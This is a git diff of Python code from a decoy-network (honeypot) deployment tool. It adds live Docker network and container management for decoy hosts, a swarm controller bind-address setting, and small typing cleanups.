topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
|
||||||
|
{
|
||||||
|
"decky_name": decky_name,
|
||||||
|
"service_name": service_name,
|
||||||
|
"topology_id": topology_id,
|
||||||
|
"service_config": validated,
|
||||||
|
"recreated": bool(apply),
|
||||||
|
},
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"services_live.update_config decky=%s topology=%s service=%s apply=%s",
|
||||||
|
decky_name, topology_id, service_name, apply,
|
||||||
|
)
|
||||||
|
return validated
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_topology_service_config(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
validated: dict,
|
||||||
|
*,
|
||||||
|
apply: bool,
|
||||||
|
) -> None:
|
||||||
|
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||||
|
if service_name not in (decky.get("services") or []):
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
cfg_blob = dict(decky.get("decky_config") or {})
|
||||||
|
sc = dict(cfg_blob.get("service_config") or {})
|
||||||
|
sc[service_name] = validated
|
||||||
|
cfg_blob["service_config"] = sc
|
||||||
|
await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
|
||||||
|
compose_path = await _rerender_topology_compose(repo, topology_id)
|
||||||
|
if apply:
|
||||||
|
if await _topology_is_agent_pinned(repo, topology_id):
|
||||||
|
await _resync_agent_topology(repo, topology_id)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _update_fleet_service_config(
|
||||||
|
repo: BaseRepository,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
validated: dict,
|
||||||
|
*,
|
||||||
|
apply: bool,
|
||||||
|
) -> None:
|
||||||
|
config, compose_path = _fleet_state_or_raise()
|
||||||
|
decky = _fleet_find_decky(config, decky_name)
|
||||||
|
if service_name not in (decky.services or []):
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
sc = dict(getattr(decky, "service_config", None) or {})
|
||||||
|
sc[service_name] = validated
|
||||||
|
decky.service_config = sc
|
||||||
|
_save_state(config, compose_path)
|
||||||
|
_write_compose(config, compose_path)
|
||||||
|
from decnet.web.db.models import LOCAL_HOST_SENTINEL
|
||||||
|
await repo.upsert_fleet_decky({
|
||||||
|
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
|
||||||
|
"name": decky.name,
|
||||||
|
"services": list(decky.services or []),
|
||||||
|
"decky_config": decky.model_dump(mode="json"),
|
||||||
|
"decky_ip": decky.ip,
|
||||||
|
"state": "running",
|
||||||
|
})
|
||||||
|
if apply:
|
||||||
|
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||||
|
if swarm_host_uuid:
|
||||||
|
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
# Docker Compose tracks the previous container by ID. If that
|
||||||
|
# container was already removed (or renamed during a prior failed
|
||||||
|
# deploy), --force-recreate fails with "No such container". Pre-
|
||||||
|
# remove by name so Compose starts from a clean slate.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: subprocess.run( # nosec B603 B607
|
||||||
|
["docker", "rm", "-f", target],
|
||||||
|
capture_output=True,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--force-recreate", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def remove_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
decky_kind: DeckyKind,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
) -> list[str]:
|
||||||
|
"""Remove *service_name* from a deployed decky.
|
||||||
|
|
||||||
|
Stops + removes the service container, persists the new services
|
||||||
|
list, re-renders the compose file (so the next ``up -d`` doesn't
|
||||||
|
bring it back), and publishes ``decky.<name>.service.removed``.
|
||||||
|
|
||||||
|
Returns the post-mutation services list.
|
||||||
|
"""
|
||||||
|
if decky_kind == "topology":
|
||||||
|
if not topology_id:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"decky_kind=topology requires topology_id",
|
||||||
|
)
|
||||||
|
services = await _remove_topology_service(
|
||||||
|
repo, topology_id, decky_name, service_name,
|
||||||
|
)
|
||||||
|
elif decky_kind == "fleet":
|
||||||
|
services = await _remove_fleet_service(repo, decky_name, service_name)
|
||||||
|
else: # pragma: no cover
|
||||||
|
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||||
|
|
||||||
|
await _publish(
|
||||||
|
topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
|
||||||
|
{
|
||||||
|
"decky_name": decky_name,
|
||||||
|
"service_name": service_name,
|
||||||
|
"topology_id": topology_id,
|
||||||
|
"services": services,
|
||||||
|
},
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"services_live.remove decky=%s topology=%s service=%s",
|
||||||
|
decky_name, topology_id, service_name,
|
||||||
|
)
|
||||||
|
return services
|
||||||
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
|
|||||||
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
||||||
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
||||||
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
||||||
|
# Bind address for the master-side swarm controller. Loopback by default —
|
||||||
|
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
|
||||||
|
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
|
||||||
|
# swarmctl-host in /etc/decnet/decnet.ini.
|
||||||
|
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
|
||||||
|
|
||||||
# Ingester batching: how many log rows to accumulate per commit, and the
|
# Ingester batching: how many log rows to accumulate per commit, and the
|
||||||
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
||||||
|
|||||||
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
|
|||||||
from decnet.geoip.lookup import Lookup
|
from decnet.geoip.lookup import Lookup
|
||||||
from decnet.geoip.paths import ensure_root
|
from decnet.geoip.paths import ensure_root
|
||||||
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
||||||
from decnet.geoip.rir.parse import parse_file
|
from decnet.geoip.rir.parse import Range, parse_file
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.geoip.rir.provider")
|
logger = logging.getLogger("decnet.geoip.rir.provider")
|
||||||
|
|
||||||
@@ -45,7 +45,7 @@ class RirProvider(Provider):
|
|||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
|
|||||||
self.component = component
|
self.component = component
|
||||||
|
|
||||||
def filter(self, record: logging.LogRecord) -> bool:
|
def filter(self, record: logging.LogRecord) -> bool:
|
||||||
record.decnet_component = self.component # type: ignore[attr-defined]
|
record.decnet_component = self.component
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
|
|||||||
span = trace.get_current_span()
|
span = trace.get_current_span()
|
||||||
ctx = span.get_span_context()
|
ctx = span.get_span_context()
|
||||||
if ctx and ctx.trace_id:
|
if ctx and ctx.trace_id:
|
||||||
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
|
record.otel_trace_id = format(ctx.trace_id, "032x")
|
||||||
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
|
record.otel_span_id = format(ctx.span_id, "016x")
|
||||||
else:
|
else:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
except Exception:
|
except Exception:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -289,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
|
|||||||
return 0
|
return 0
|
||||||
drained = 0
|
drained = 0
|
||||||
for topo in pending:
|
for topo in pending:
|
||||||
tid = topo["id"]
|
tid = topo.id
|
||||||
try:
|
try:
|
||||||
await _deployer.resync_agent_topology(repo, tid)
|
await _deployer.resync_agent_topology(repo, tid)
|
||||||
await repo.set_topology_resync(tid, False)
|
await repo.set_topology_resync(tid, False)
|
||||||
drained += 1
|
drained += 1
|
||||||
log.info("topology %s resynced to agent %s",
|
log.info("topology %s resynced to agent %s",
|
||||||
tid, topo.get("target_host_uuid"))
|
tid, topo.target_host_uuid)
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc: # noqa: BLE001
|
||||||
log.warning(
|
log.warning(
|
||||||
"topology %s resync failed (will retry): %s", tid, exc,
|
"topology %s resync failed (will retry): %s", tid, exc,
|
||||||
|
|||||||
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_lan_change(
|
||||||
|
repo: Any,
|
||||||
|
topology_id: str,
|
||||||
|
*,
|
||||||
|
created: Optional[tuple[str, str, bool]] = None,
|
||||||
|
removed: Optional[str] = None,
|
||||||
|
) -> None:
|
||||||
|
"""Create or remove the docker bridge for a live LAN op + re-render compose.
|
||||||
|
|
||||||
|
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
|
||||||
|
write lands. Skips when:
|
||||||
|
|
||||||
|
* the topology is not active/degraded (a pending topology gets its
|
||||||
|
networks created at deploy time),
|
||||||
|
* the topology is pinned to a swarm agent (cross-host materialisation
|
||||||
|
isn't implemented; the agent's apply_topology RPC re-renders the
|
||||||
|
whole compose at next push),
|
||||||
|
* the docker SDK / networking primitive raises (logged, not
|
||||||
|
re-raised — the DB row is the source of truth).
|
||||||
|
"""
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
if topology is None:
|
||||||
|
return
|
||||||
|
status = topology.status
|
||||||
|
if status not in ("active", "degraded"):
|
||||||
|
return
|
||||||
|
if topology.target_host_uuid:
|
||||||
|
_log.info(
|
||||||
|
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
|
||||||
|
topology_id,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
|
||||||
|
# Lazy imports — these pull in docker.py / network.py which both
|
||||||
|
# require the docker SDK; keeping them out of module-import keeps
|
||||||
|
# the mutator usable in test environments that stub docker.
|
||||||
|
import docker
|
||||||
|
from decnet.engine.deployer import _topology_compose_path
|
||||||
|
from decnet.network import create_bridge_network, remove_bridge_network
|
||||||
|
from decnet.topology.compose import _network_name, write_topology_compose
|
||||||
|
|
||||||
|
client = docker.from_env()
|
||||||
|
try:
|
||||||
|
if created is not None:
|
||||||
|
name, subnet, is_dmz = created
|
||||||
|
net_name = _network_name(topology_id, name)
|
||||||
|
try:
|
||||||
|
create_bridge_network(
|
||||||
|
client, net_name, subnet, internal=not is_dmz,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
|
||||||
|
topology_id, name, subnet, exc,
|
||||||
|
)
|
||||||
|
# Don't re-raise — the DB row is the source of truth.
|
||||||
|
# Operator can retry by removing + re-adding the LAN.
|
||||||
|
if removed is not None:
|
||||||
|
net_name = _network_name(topology_id, removed)
|
||||||
|
try:
|
||||||
|
remove_bridge_network(client, net_name)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
|
||||||
|
topology_id, removed, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Re-render compose so the file on disk matches the DB. Even
|
||||||
|
# when the bridge create above failed, a future redeploy will
|
||||||
|
# try to bring the network back from the compose definition.
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is not None:
|
||||||
|
try:
|
||||||
|
write_topology_compose(
|
||||||
|
hydrated, _topology_compose_path(topology_id),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live LAN op: compose re-render failed topology=%s: %s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
|
||||||
|
_log.error(
|
||||||
|
"live LAN materialisation crashed topology=%s: %s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _is_buildx_wedge(exc: BaseException) -> bool:
|
||||||
|
"""True when *exc* looks like the buildx EROFS wedge.
|
||||||
|
|
||||||
|
We consult both the structured CalledProcessError.stderr and the
|
||||||
|
str(exc) form because ``_compose_with_retry`` raises a synthetic
|
||||||
|
CalledProcessError whose ``stderr`` contains the recovery hint
|
||||||
|
(which preserves the wedge signatures verbatim).
|
||||||
|
"""
|
||||||
|
from decnet.engine.deployer import (
|
||||||
|
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
|
||||||
|
)
|
||||||
|
stderr = ""
|
||||||
|
if hasattr(exc, "stderr") and exc.stderr:
|
||||||
|
stderr = str(exc.stderr)
|
||||||
|
haystack = (stderr + " " + str(exc)).lower()
|
||||||
|
return (
|
||||||
|
_BUILDX_WEDGE_SIGNATURE in haystack
|
||||||
|
and _BUILDX_EROFS_SIGNATURE in haystack
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _compose_up_with_buildkit_fallback(
|
||||||
|
*args: str, compose_file, label: str,
|
||||||
|
) -> None:
|
||||||
|
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
|
||||||
|
|
||||||
|
The buildx activity dir occasionally lands on a read-only mount —
|
||||||
|
happens enough on operator dev boxes that we don't want a single
|
||||||
|
wedge to abort a live decky-add. When _compose_with_retry raises
|
||||||
|
with the EROFS-wedge signatures, we retry once with
|
||||||
|
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
|
||||||
|
use the activity dir and isn't affected.
|
||||||
|
|
||||||
|
*label* is a human-readable identifier used only in log lines so an
|
||||||
|
operator can grep the fall-back back to the originating op.
|
||||||
|
"""
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import _compose_with_retry
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry(*args, compose_file=compose_file),
|
||||||
|
)
|
||||||
|
return
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
if not _is_buildx_wedge(exc):
|
||||||
|
raise
|
||||||
|
_log.warning(
|
||||||
|
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
|
||||||
|
"(legacy builder). Recover the buildx state at your leisure: "
|
||||||
|
"rm -rf ~/.docker/buildx/activity && "
|
||||||
|
"docker buildx create --name decnet-builder --use --bootstrap",
|
||||||
|
label,
|
||||||
|
)
|
||||||
|
# Outside the except so the second attempt's traceback isn't
|
||||||
|
# nested under the first failure if it also blows up.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry(
|
||||||
|
*args, compose_file=compose_file,
|
||||||
|
env={"DOCKER_BUILDKIT": "0"},
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
|
||||||
|
"""Compose service names for one decky: base + each per-decky service.
|
||||||
|
|
||||||
|
Skips ``fleet_singleton`` services — those run once fleet-wide and
|
||||||
|
don't have a per-decky compose entry. Mirrors the same filter
|
||||||
|
applied at compose-render time
|
||||||
|
(:mod:`decnet.topology.compose.generate_topology_compose`).
|
||||||
|
"""
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
targets = [decky_name]
|
||||||
|
for svc_name in services:
|
||||||
|
try:
|
||||||
|
svc = get_service(svc_name)
|
||||||
|
except KeyError:
|
||||||
|
# Unknown service — leave it; the compose render won't emit
|
||||||
|
# a fragment for it, so compose up will simply ignore the
|
||||||
|
# name with a clear "no such service" error. Surface that
|
||||||
|
# rather than silently dropping it.
|
||||||
|
targets.append(f"{decky_name}-{svc_name}")
|
||||||
|
continue
|
||||||
|
if svc.fleet_singleton:
|
||||||
|
continue
|
||||||
|
targets.append(f"{decky_name}-{svc_name}")
|
||||||
|
return targets
|
||||||
|
|
||||||
|
|
||||||
|
async def _live_topology_or_none(
|
||||||
|
repo: Any, topology_id: str,
|
||||||
|
) -> Optional[dict[str, Any]]:
|
||||||
|
"""Return the topology row only when it's eligible for live materialisation.
|
||||||
|
|
||||||
|
Returns None (so callers can skip with a single ``if`` check) when:
|
||||||
|
|
||||||
|
* the topology doesn't exist;
|
||||||
|
* status is not ``active`` or ``degraded`` (pending topologies get
|
||||||
|
everything materialised at deploy time);
|
||||||
|
* the topology is pinned to a swarm agent (cross-host live editing
|
||||||
|
is its own routing workstream).
|
||||||
|
"""
|
||||||
|
topology = await repo.get_topology(topology_id)
|
||||||
|
if topology is None:
|
||||||
|
return None
|
||||||
|
if topology.status not in ("active", "degraded"):
|
||||||
|
return None
|
||||||
|
if topology.target_host_uuid:
|
||||||
|
_log.info(
|
||||||
|
"live decky op skipped (agent-pinned topology=%s); "
|
||||||
|
"next agent push will reconcile",
|
||||||
|
topology_id,
|
||||||
|
)
|
||||||
|
return None
|
||||||
|
return topology
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_compose(repo: Any, topology_id: str) -> None:
|
||||||
|
"""Re-render the per-topology compose file from the current DB.
|
||||||
|
|
||||||
|
Called after each materialisation step so the file on disk matches
|
||||||
|
the topology rows. Soft-fails: a render error is logged but
|
||||||
|
doesn't poison the DB-side mutation.
|
||||||
|
"""
|
||||||
|
from decnet.engine.deployer import _topology_compose_path
|
||||||
|
from decnet.topology.compose import write_topology_compose
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
return
|
||||||
|
try:
|
||||||
|
write_topology_compose(hydrated, _topology_compose_path(topology_id))
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live op: compose re-render failed topology=%s: %s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_spawn(
|
||||||
|
repo: Any, topology_id: str, decky_name: str, services: list[str],
|
||||||
|
) -> bool:
|
||||||
|
"""compose up -d --no-deps --build for one decky (base + services).
|
||||||
|
|
||||||
|
Re-renders compose first so the file lists the new decky. Returns
|
||||||
|
True when compose-up reported success, False otherwise (or when
|
||||||
|
the topology isn't eligible for live materialisation — pending
|
||||||
|
topologies skip and return False so the caller doesn't flip the
|
||||||
|
state to ``running`` based on a no-op). Best-effort: docker
|
||||||
|
failure is logged, not re-raised — DB row is the source of truth.
|
||||||
|
"""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return False
|
||||||
|
from decnet.engine.deployer import _topology_compose_path
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
targets = _decky_targets(decky_name, services)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
try:
|
||||||
|
await _compose_up_with_buildkit_fallback(
|
||||||
|
"up", "-d", "--no-deps", "--build", *targets,
|
||||||
|
compose_file=compose_path,
|
||||||
|
label=f"live add_decky topology={topology_id} decky={decky_name}",
|
||||||
|
)
|
||||||
|
return True
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live add_decky: compose up failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_remove(
|
||||||
|
repo: Any, topology_id: str, decky_name: str, services: list[str],
|
||||||
|
) -> None:
|
||||||
|
"""compose stop + rm -f for one decky's containers, then re-render."""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import _compose, _topology_compose_path
|
||||||
|
|
||||||
|
targets = _decky_targets(decky_name, services)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
|
||||||
|
# longer mentions the decky, so a stop run AFTER rendering would
|
||||||
|
# find no service to act on.
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("stop", *targets, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_connect(
|
||||||
|
repo: Any, topology_id: str,
|
||||||
|
decky_name: str, lan_name: str, ipv4_address: str,
|
||||||
|
) -> None:
|
||||||
|
"""SDK ``network.connect`` to multi-home a running base container.
|
||||||
|
|
||||||
|
Service containers share the base's netns via ``network_mode:
|
||||||
|
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
|
||||||
|
the base alone gives every service container the new interface for
|
||||||
|
free — we don't need to iterate.
|
||||||
|
"""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import docker
|
||||||
|
from decnet.topology.compose import _container_name, _network_name
|
||||||
|
|
||||||
|
net_name = _network_name(topology_id, lan_name)
|
||||||
|
container_name = _container_name(topology_id, decky_name)
|
||||||
|
try:
|
||||||
|
client = docker.from_env()
|
||||||
|
net = client.networks.get(net_name)
|
||||||
|
container = client.containers.get(container_name)
|
||||||
|
net.connect(container, ipv4_address=ipv4_address)
|
||||||
|
except docker.errors.APIError as exc:
|
||||||
|
# Idempotency — already on the network is fine.
|
||||||
|
msg = str(exc).lower()
|
||||||
|
if "already" in msg or "endpoint" in msg and "exists" in msg:
|
||||||
|
_log.info(
|
||||||
|
"live attach_decky: %s already on network %s — skipping",
|
||||||
|
container_name, net_name,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
_log.error(
|
||||||
|
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_disconnect(
|
||||||
|
repo: Any, topology_id: str, decky_name: str, lan_name: str,
|
||||||
|
) -> None:
|
||||||
|
"""SDK ``network.disconnect`` to drop a multi-home edge."""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import docker
|
||||||
|
from decnet.topology.compose import _container_name, _network_name
|
||||||
|
|
||||||
|
net_name = _network_name(topology_id, lan_name)
|
||||||
|
container_name = _container_name(topology_id, decky_name)
|
||||||
|
try:
|
||||||
|
client = docker.from_env()
|
||||||
|
net = client.networks.get(net_name)
|
||||||
|
container = client.containers.get(container_name)
|
||||||
|
net.disconnect(container)
|
||||||
|
except docker.errors.APIError as exc:
|
||||||
|
msg = str(exc).lower()
|
||||||
|
if "not connected" in msg or "no such" in msg:
|
||||||
|
_log.info(
|
||||||
|
"live detach_decky: %s already off network %s — skipping",
|
||||||
|
container_name, net_name,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
_log.error(
|
||||||
|
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
|
||||||
|
topology_id, decky_name, lan_name, exc,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_services_diff(
|
||||||
|
repo: Any, topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
added: list[str],
|
||||||
|
removed: list[str],
|
||||||
|
) -> None:
|
||||||
|
"""Add/remove per-service containers without touching siblings.
|
||||||
|
|
||||||
|
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
|
||||||
|
without coupling the mutator to that module — service mutations
|
||||||
|
routed via the mutator queue publish ``mutation.applied`` while the
|
||||||
|
direct API publishes ``decky.<name>.service_added``; they share
|
||||||
|
machinery, not control flow.
|
||||||
|
"""
|
||||||
|
if not added and not removed:
|
||||||
|
return
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import _compose, _topology_compose_path
|
||||||
|
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
|
||||||
|
if add_targets:
|
||||||
|
try:
|
||||||
|
await _compose_up_with_buildkit_fallback(
|
||||||
|
"up", "-d", "--no-deps", "--build", *add_targets,
|
||||||
|
compose_file=compose_path,
|
||||||
|
label=f"live update_decky add topology={topology_id} decky={decky_name}",
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.error(
|
||||||
|
"live update_decky add: compose up failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
rm_targets = _decky_targets(decky_name, list(removed))[1:]
|
||||||
|
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
|
||||||
|
if not rm_targets:
|
||||||
|
break
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live update_decky %s failed topology=%s decky=%s: %s",
|
||||||
|
action_name, topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_recreate_base(
|
||||||
|
repo: Any, topology_id: str, decky_name: str,
|
||||||
|
) -> None:
|
||||||
|
"""Force-recreate just the base container (used for forwards_l3 flips).
|
||||||
|
|
||||||
|
DESTRUCTIVE: kills any in-container state on the base. Service
|
||||||
|
containers re-attach via ``network_mode: service:<base>`` after the
|
||||||
|
base is rebuilt. Caller is responsible for gating this on an
|
||||||
|
explicit operator-supplied ``force=true`` flag.
|
||||||
|
"""
|
||||||
|
if await _live_topology_or_none(repo, topology_id) is None:
|
||||||
|
return
|
||||||
|
import anyio
|
||||||
|
from decnet.engine.deployer import (
|
||||||
|
_compose_with_retry, _topology_compose_path,
|
||||||
|
)
|
||||||
|
await _rerender_compose(repo, topology_id)
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
try:
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_with_retry(
|
||||||
|
"up", "-d", "--no-deps", "--force-recreate", decky_name,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
